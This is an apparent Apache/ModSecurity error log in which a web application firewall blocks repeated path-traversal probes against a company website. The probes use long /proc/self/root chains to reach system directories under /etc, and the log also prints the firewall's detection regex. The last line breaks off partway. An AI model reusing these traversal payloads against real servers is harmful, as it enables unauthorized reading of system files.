[Fri Mar 20 06:11:51.449068 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:60710] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PV-oXxyEfFpUF8f9soQAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:52.873304 2026] [:error] [pid 11642:tid 140411624429312] [client 74.7.243.128:60722] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PWLninkcc-iUj5ApJPgAAA44"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:54.136738 2026] [:error] [pid 31215:tid 140411699963648] [client 74.7.243.128:60738] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PWgF0L0L-SsrnPo5SywAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:55.433826 2026] [:error] [pid 10189:tid 140411557287680] [client 74.7.243.128:60746] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PWzJ3M9BSuKP7CAYCkwAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:58.815521 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:60756] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PXuoXxyEfFpUF8f9srAAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:12:02.728897 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:33828] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PYta6ubjKNq_cu4a9ewAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:12:04.056157 2026] [:error] [pid 11642:tid 140411733534464] [client 74.7.243.128:33830] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PZLninkcc-iUj5ApJRgAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:12:05.353105 2026] [:error] [pid 11167:tid 140411607643904] [client 74.7.243.128:33844] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PZfHIg5MgXLBnicPkoQAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:12:06.679700 2026] [:error] [pid 9818:tid 140411658000128] [client 74.7.243.128:33846] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PZl1pVZ5mVmJwsFMbPAAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:12:08.055992 2026] [:error] [pid 31215:tid 140411632822016] [client 74.7.243.128:33856] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PaAF0L0L-SsrnPo5S0QAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:12:09.319823 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.243.128:33864] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PaTJ3M9BSuKP7CAYCowAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:12:11.635236 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.243.128:40090] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PaxCii7xarUs8iHZS9AAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:12:14.967688 2026] [:error] [pid 11642:tid 140411683178240] [client 74.7.243.128:40096] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Pbrninkcc-iUj5ApJUAAAA4c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:12:18.411523 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:40110] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Pcta6ubjKNq_cu4a9gAAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:12:19.695749 2026] [:error] [pid 11167:tid 140411624429312] [client 74.7.243.128:59428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Pc_HIg5MgXLBnicPkpgAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:12:22.214489 2026] [:error] [pid 9818:tid 140411599251200] [client 74.7.243.128:59434] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Pdl1pVZ5mVmJwsFMbRAAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:12:23.553413 2026] [:error] [pid 21219:tid 140411716749056] [client 74.7.243.128:59440] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Pd_XLqtnMIWvjpaKFRgAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:12:27.026218 2026] [:error] [pid 21219:tid 140411699963648] [client 74.7.243.128:59450] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Pe_XLqtnMIWvjpaKFSwAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:12:34.899071 2026] [:error] [pid 11167:tid 140411582465792] [client 74.7.243.128:59464] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PgvHIg5MgXLBnicPkwgAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:12:38.325880 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:58452] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Phta6ubjKNq_cu4a9iwAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:12:39.626510 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:35908] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Ph-oXxyEfFpUF8f9szAAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:12:42.007289 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.243.128:35910] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 